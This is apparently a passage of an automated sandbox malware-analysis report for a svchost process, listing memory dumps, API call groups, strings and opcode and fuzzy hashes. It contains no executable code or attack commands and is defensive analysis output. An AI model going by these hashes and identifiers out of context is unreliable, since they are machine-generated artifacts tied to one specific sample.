                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: e59c82fe0f2ec094d57bed0c98c400f651c9509d4f271adb2dc6c0c8ab65cd82
                                                  • Instruction ID: 52dda985c3d39f420bcc22a75fd06d9d154094f710ff3b01f2c24b01228285a7
                                                  • Opcode Fuzzy Hash: e59c82fe0f2ec094d57bed0c98c400f651c9509d4f271adb2dc6c0c8ab65cd82
                                                  • Instruction Fuzzy Hash: 0BF0313270468193F7208B11E48D75A63B9F789F99F8C4020DA4A57954DF7CC68CC701
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: f0253bf3bdf199985f6c2e3295dc4ed2139203a79a19ecb3f89a7ae47e478241
                                                  • Instruction ID: 15b9e0c93e7dc95d06c7043a8572a5f88681245db909fffeb7f8f50c5d288acb
                                                  • Opcode Fuzzy Hash: f0253bf3bdf199985f6c2e3295dc4ed2139203a79a19ecb3f89a7ae47e478241
                                                  • Instruction Fuzzy Hash: 5BF06D61B11B0483EA208B24E84E3697368AB8BFB1F5C1659DA6B576E4DF2CC04DC751
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: 2f10e4b1bb55b8476a2540ab013bb770cdd98ab53081f051a71e1da94108be6d
                                                  • Instruction ID: 3a6fac10a214a94145e13ff6e58aaedbd7ce41485c4c87c1c80f629b5ae023af
                                                  • Opcode Fuzzy Hash: 2f10e4b1bb55b8476a2540ab013bb770cdd98ab53081f051a71e1da94108be6d
                                                  • Instruction Fuzzy Hash: B1F08C20B08B8083EA108B17F95E11AB369AB4AFC0F4C9430EE4B27B18DF2CC4498781
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f6859916c19b6cfbcb507cf25c27f09489149bbcb7d7f97a4334c647396ff50a
                                                  • Instruction ID: 3dbb780ffd80bfaf1026c1a630c640ef9061efee36fd895f501be01be365d3ca
                                                  • Opcode Fuzzy Hash: f6859916c19b6cfbcb507cf25c27f09489149bbcb7d7f97a4334c647396ff50a
                                                  • Instruction Fuzzy Hash: EE02DA32619B8486EB60CB19F49835AB7E4F3C5B91F140015EA8E97BA8DF7CC488CF41
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: ca3cd154e60a15d8a4e1dbc58d691a45d730f05f61dafc41667bf4e2f9e70319
                                                  • Instruction ID: 24b1dc3ef6c9c9fd799b9581201e29d74829ada07d35805b771766d2a9da65ea
                                                  • Opcode Fuzzy Hash: ca3cd154e60a15d8a4e1dbc58d691a45d730f05f61dafc41667bf4e2f9e70319
                                                  • Instruction Fuzzy Hash: 7C61D832A19B4487EA60DB15E49C31AB7E4F38AB45F140116EA8E57BA4DF7CC548CF82
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction ID: a92ed6982f38ce7622423aceb9e26da55953c483c14c3998a68a97012f7559a4
                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction Fuzzy Hash: B7117333F50B5103F6541228E85F3693449AB57B7CF1E0634E977276D6CF2C8849424B
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000003.1748146841.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_3_2a6612d0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction ID: 7a71003ada61c8629b24bb7d176cb117714ffb0b1535e1945c2cc31c2d50b86e
                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction Fuzzy Hash: 51119122F10AC103F6659178E45E3A6108C7F67B75F5C0A24AA66476F6CF2C8BCC4502
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: 4e447ab6f43e0dd97ca79f956e0f36bf66df1e20fe9b1e0794ac99b1f0ba565c
                                                  • Instruction ID: 128b51ba659b368948b4925433f5bc49ba7cd8c178832eba4cb72f326331cb1b
                                                  • Opcode Fuzzy Hash: 4e447ab6f43e0dd97ca79f956e0f36bf66df1e20fe9b1e0794ac99b1f0ba565c
                                                  • Instruction Fuzzy Hash: 9251CC32F15A008BEB14CB15E44CB6977D9E346F89F188161EA4B63B88DF7CC889D781
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000003.1748146841.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_3_2a6612d0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm$r iterator'
                                                  • API String ID: 3242871069-2773574969
                                                  • Opcode ID: ca5d9eaa95c438554c2903f354aaa720dc8acf5dd20a0dc0b5b10fb3cccfabab
                                                  • Instruction ID: 86db062c31a8b268b47f7e416526afb4506450d8c3c56637c593231358091123
                                                  • Opcode Fuzzy Hash: ca5d9eaa95c438554c2903f354aaa720dc8acf5dd20a0dc0b5b10fb3cccfabab
                                                  • Instruction Fuzzy Hash: 07519C32F116408BDB64CB15E44CB68339DEB96F9CF188161EA4A47788DF7DD889C701
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: 0aa225cb1cadef72a45b87c5109ef4035a9212e37d75eff9152e78c65fc2b4b2
                                                  • Instruction ID: 80110a7fba44ff7460eb7631826fb76446cc0e6ce85aed91c2c750cbc5eb6b57
                                                  • Opcode Fuzzy Hash: 0aa225cb1cadef72a45b87c5109ef4035a9212e37d75eff9152e78c65fc2b4b2
                                                  • Instruction Fuzzy Hash: 32619236A04BC4C6D7608F15E44839AB7E4F786B95F088215EB9A27B99DF3CC198CB41
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction ID: 224753ee38e5d0ba7835519647d6d061b51f7ac1087840859968921fabf2904e
                                                  • Opcode Fuzzy Hash: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction Fuzzy Hash: 8551903AA042808BEB648F21904C35877E8F756F96F1C8115DA8A6BBD9CF3CD459C782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000003.1748146841.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_3_2a6612d0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction ID: ef7c62abd7a9e5bad5df920b8fa360c37b8c131fb216a3eb7d125f9376ce9bfd
                                                  • Opcode Fuzzy Hash: 4449a9b682cb89d450f78971ce03173a0e31fd8ce334149503fbd8f0d91e758c
                                                  • Instruction Fuzzy Hash: FA514932E002848BEB648B25D44CB5877ACFB56F95F1C8115EA9947AE5CF3CD8A9C702
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID: pid_
                                                  • API String ID: 517849248-4147670505
                                                  • Opcode ID: 7831a55c2ef4f99c6d4e75b771c167ca5dae29e291e29756cdefab7d0c6e5865
                                                  • Instruction ID: 770c43d28c9fd79593e71f780bc810af6542665d7766ab34459d9119c69d4898
                                                  • Opcode Fuzzy Hash: 7831a55c2ef4f99c6d4e75b771c167ca5dae29e291e29756cdefab7d0c6e5865
                                                  • Instruction Fuzzy Hash: E2118421B14B4197EB20D725E80D75962E8B746B46F884421AE4BA36A4EF2DC90DC781
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: cd7ead245226fb0ff8416072dd6c86dfb22f41206e5c1354dc7575ed798eccf0
                                                  • Instruction ID: 93fc2e490741f9a152c48cb42a04a3931cb74f18af2dd12d2bd1c3c14e415ef2
                                                  • Opcode Fuzzy Hash: cd7ead245226fb0ff8416072dd6c86dfb22f41206e5c1354dc7575ed798eccf0
                                                  • Instruction Fuzzy Hash: FC319C22B01B518BEA15DF56E54CB6963E8FB56F81F0C8020DE4A27B55EF3CC4A9C381
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 3d8111ac03d79fd3404cfd3b8bb5e35de645481c19c298062627da4548e3af8b
                                                  • Instruction ID: b774093354ebc356d19f035411a6994c3d64d3291e7f35a8b436ddcfbd01248f
                                                  • Opcode Fuzzy Hash: 3d8111ac03d79fd3404cfd3b8bb5e35de645481c19c298062627da4548e3af8b
                                                  • Instruction Fuzzy Hash: D3D1D172B04A808AE711CF79D5493AC37B9F346B98F584216DE5EA7B99DF38C40AC341
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: 68e3aa918e40f2a59efd4a77bf87b80fbffd346b4caa48f43eabcedde74eb837
                                                  • Instruction ID: cf2164faa81bdd266212257b1bc29a933f7f64c660f075be489a3aab83e820f3
                                                  • Opcode Fuzzy Hash: 68e3aa918e40f2a59efd4a77bf87b80fbffd346b4caa48f43eabcedde74eb837
                                                  • Instruction Fuzzy Hash: 9A011772A10A90C7E718DF66E80D24977B6F78AF84F0E4425EE4A63728DF38D459C741
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002A6613132BB), ref: 000002A6613133EC
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002A6613132BB), ref: 000002A661313477
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleErrorLastMode
                                                  • String ID:
                                                  • API String ID: 953036326-0
                                                  • Opcode ID: 9a0209e8511a10fd3386f0f56cb65ece6bc0a2612e029ae558c28dd6c9360970
                                                  • Instruction ID: e2fbc28f0afc6a35a9c67c832bf3dbc1fa634c43ad97298024dd2ca6db1fea2a
                                                  • Opcode Fuzzy Hash: 9a0209e8511a10fd3386f0f56cb65ece6bc0a2612e029ae558c28dd6c9360970
                                                  • Instruction Fuzzy Hash: 7791BD72B1065086FB61DF65948E3AD3BA8B346FA8F584119DE0B77A85DF3CC44AC702
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: e1208e257ec3ecfd7a62d9249f0af5cdd52c99c47e99b6bb550ebf232a0e338b
                                                  • Instruction ID: 95ab842e01b26eb07c42a0fb0274baa5d9579b9343779e061653e5d7540bee3d
                                                  • Opcode Fuzzy Hash: e1208e257ec3ecfd7a62d9249f0af5cdd52c99c47e99b6bb550ebf232a0e338b
                                                  • Instruction Fuzzy Hash: 08112126B10F008AEB00DF60E85D3A933A8F719B58F480E21DA6E57764DF7CC159C341
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: 4fed39dde851fcd8fc4d049624dd97c798a08dd805cf236f1a62443ce0db6f3a
                                                  • Instruction ID: d02b37d4f1b7b9c08982a15ae0faa58666006e9855d76bb0d61e9d207c326c35
                                                  • Opcode Fuzzy Hash: 4fed39dde851fcd8fc4d049624dd97c798a08dd805cf236f1a62443ce0db6f3a
                                                  • Instruction Fuzzy Hash: EA71C536B00B9147EB68DF39995C3AA67E8F786F85F480015ED0B63B45DF38C6098781
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000003.1748146841.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_3_2a6612d0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: 432acf9014410cd6b61937995a8f5639f2b935c8f333f59e616f22aec490a317
                                                  • Instruction ID: 60ed4d8ccdbb825ea157a772ecec43f14b4d3f10b816da396c65b89541fac487
                                                  • Opcode Fuzzy Hash: 432acf9014410cd6b61937995a8f5639f2b935c8f333f59e616f22aec490a317
                                                  • Instruction Fuzzy Hash: C9619132E04BC482DB608B15E4497DAB7A8FB86B84F084215EF9943BA5DF7CC1D9CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: 60806b6e5981ec3bc5cc332c647bab245b1cb03d9a404e51140869ab20dc0ddc
                                                  • Instruction ID: 1f5e9debbc4bf8e74639551f3f6b9d59bff17c03b06f7a680c8472e6f2788279
                                                  • Opcode Fuzzy Hash: 60806b6e5981ec3bc5cc332c647bab245b1cb03d9a404e51140869ab20dc0ddc
                                                  • Instruction Fuzzy Hash: 6251C632B0478183E664DA35A55D3AAA7E9F387F81F4E4015DE5B23B49DF3DC4098782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: a661c2d173b23182f505dc60736120a771a3f0ad42df517ff57706cbb13cb6f8
                                                  • Instruction ID: a830656e7f8045fadf963863927383c27f775124ccbcb72d38e4ca0409c3cacb
